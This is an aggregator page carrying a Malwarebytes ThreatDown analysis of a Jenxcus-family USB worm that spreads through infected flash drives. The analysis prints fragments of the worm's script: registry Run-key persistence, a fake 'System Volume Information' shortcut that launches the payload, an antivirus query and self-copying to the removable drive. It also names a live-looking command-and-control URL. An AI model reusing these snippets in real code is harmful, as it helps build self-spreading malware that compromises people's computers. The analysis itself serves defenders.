惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

S
Schneier on Security
雷峰网
雷峰网
S
Securelist
V
Vulnerabilities – Threatpost
S
SegmentFault 最新的问题
T
The Exploit Database - CXSecurity.com
A
About on SuperTechFans
T
Threat Research - Cisco Blogs
Attack and Defense Labs
Attack and Defense Labs
L
LangChain Blog
Cyberwarzone
Cyberwarzone
Engineering at Meta
Engineering at Meta
Google DeepMind News
Google DeepMind News
H
Hackread – Cybersecurity News, Data Breaches, AI and More
V
V2EX
Y
Y Combinator Blog
云风的 BLOG
云风的 BLOG
L
Lohrmann on Cybersecurity
S
Security Affairs
S
Secure Thoughts
P
Privacy & Cybersecurity Law Blog
T
Tailwind CSS Blog
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
C
CXSECURITY Database RSS Feed - CXSecurity.com
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
Application and Cybersecurity Blog
Application and Cybersecurity Blog
Cisco Talos Blog
Cisco Talos Blog
Spread Privacy
Spread Privacy
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
Microsoft Security Blog
Microsoft Security Blog
博客园 - 叶小钗
H
Heimdal Security Blog
L
LINUX DO - 热门话题
月光博客
月光博客
Apple Machine Learning Research
Apple Machine Learning Research
D
Darknet – Hacking Tools, Hacker News & Cyber Security
C
CERT Recently Published Vulnerability Notes
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
J
Java Code Geeks
Google Online Security Blog
Google Online Security Blog
WordPress大学
WordPress大学
D
DataBreaches.Net
N
Netflix TechBlog - Medium
The Hacker News
The Hacker News
N
News and Events Feed by Topic
C
Check Point Blog
博客园_首页
Scott Helme
Scott Helme
T
Troy Hunt's Blog
U
Unit 42

Threat Walkthroughs – ThreatDown by Malwarebytes

Fake Booking.com emails target hotels Phishers go “interplanetary” to get company login credentials “Enhanced Bonus” QR code phish steals Microsoft credentials Analyzing a Mispadu Trojan’s attack chain How a clipboard hijacker delivers Lumma Stealer - ThreatDown by Malwarebytes Web shop spreads SocGolish malware and steals credit cards Clipboard hijacker tries to install a Trojan A visit to a print shop put a password stealer on a co-worker’s laptop Watch out! Mobidash Android adware spread through phishing and online links
USB worms: Still wriggling on to under-protected computers after all these years
Pieter Arntz · 2025-02-24 · via Threat Walkthroughs – ThreatDown by Malwarebytes
USB symbol header image

Malware doesn’t care if it’s being talked about or not.

When you think of malware, you probably don’t think of old school USB worms, but our Managed Detection and Response (MDR) experts actually noticed an increase in USB worms in 2024. In this article we present an example of a USB worm from the Jenxcus family they recently ran into.

USB worms spread through infected USB drives. When an unsuspecting user plugs an infected drive into their computer, a dropper initiates a payload and infects the system. In turn, the infected system will then infect every USB device that’s plugged into it.

full VBE code

Some of the commands are clearly gathering system information, such as the computer’s hostname and the current username.

IWshShell3.ExpandEnvironmentStrings("%computername%");
IWshShell3.ExpandEnvironmentStrings("%username%");

Other commands query system information using Windows Management Instrumentation (WMI).

ISWbemServicesEx.ExecQuery("select * from win32_logicaldisk");
ISWbemServicesEx.ExecQuery("select * from win32_operatingsystem");

The script also adds two startup entries to the registry for persistence.

IWshShell3.RegWrite("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\Microsoft", "wscript.exe //B \"C:\\Users\\{username}\\AppData\\Roaming\\Microsoft.vbe\"", "REG_SZ");
IWshShell3.RegWrite("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\Microso", "wscript.exe //B \"C:\\Users\\{username}\\AppData\\Roaming\\Microsoft.vbe\"", "REG_SZ");

It also creates a fake Microsoft shortcut on the F: drive—which is usually a removable drive—which runs Microsoft.vbe to trick users.

IWshShell3.CreateShortcut("F:\System Volume Information.lnk");
IWshShortcut.TargetPath("cmd.exe");
IWshShortcut.Arguments("/c start Microsoft.vbe&start explorer System Volume Information&exit");

It queries the active antivirus protection:

ISWbemServicesEx.ExecQuery("select * from antivirusproduct", "wql", "0");

And it displays the typical USB Worm behavior by copying itself to the F: drive, where it will patiently wait for the next person to plug the flash drive into a Windows system.

IFileSystem3.CopyFile("C:\\Users\\{username}\\AppData\\Roaming\\Microsoft.vbe", "F:\\Microsoft.vbe", "true");

The script also references a URL at update32.hopto.org:82/is-ready/ for command and control, which has been active since 2015. Because of the /is-ready/ part of the URL, we suspect that this worm is a WSH Remote Access Trojan (RAT) in the Jenxcus family.

The WSH RAT (Windows Script Host Remote Access Trojan) has been around since at least 2013. Among other things, it is capable of stealing system information and stealing passwords from web browsers and email clients. It is also capable of disabling anti-malware solutions and Windows’ UAC (User Account Control).

Maybe the deprecation of VBScript in 2027 will finally put an end to these Worms. Until then, ThreatDown’s Application Block can stop unwanted scripting engines, and its Device Control can prevent unauthorized devices from accessing sensitive data and ensure that only approved devices can interact with your network.